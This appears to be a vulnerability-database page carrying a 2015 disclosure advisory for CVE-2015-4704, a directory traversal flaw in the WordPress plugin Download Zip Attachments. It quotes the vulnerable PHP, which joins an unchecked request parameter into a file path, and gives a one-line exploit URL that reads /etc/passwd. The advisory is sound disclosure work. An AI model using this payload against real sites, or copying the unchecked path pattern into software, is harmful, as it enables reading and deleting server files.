| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| WordPress Download Zip Attachments 'download.php' Plugin Arbitrary File Download Vulnerability | 8 Jul 201500:00 | – | cnvd | |
| CVE-2015-4704 | 23 May 201703:56 | – | cve | |
| CVE-2015-4704 | 23 May 201703:56 | – | cvelist | |
| EUVD-2015-4723 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-4704 | 23 May 201704:29 | – | nvd | |
| WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 202000:00 | – | openvas | |
| Directory traversal | 23 May 201704:29 | – | prion | |
| Download Zip Attachments <= 1.0 - Arbitrary File Download | 10 Jun 201500:00 | – | wpvulndb |
`Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description:
Download all attachments from the post into a zip file.
Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.
<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
define('WP_USE_THEMES', false);
require('../../../wp-load.php');
require "create_zip_file.php";
$uploads = wp_upload_dir();
$tmp_location = $uploads['path']."/".$_REQUEST['File'];
//echo $tmp_location;
$zip = new CreateZipFile;
$zip->forceDownload($tmp_location,false);
unlink($tmp_location);
exit;
}
CVEID: 2015-4704
OSVDB:
Exploit Code:
• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation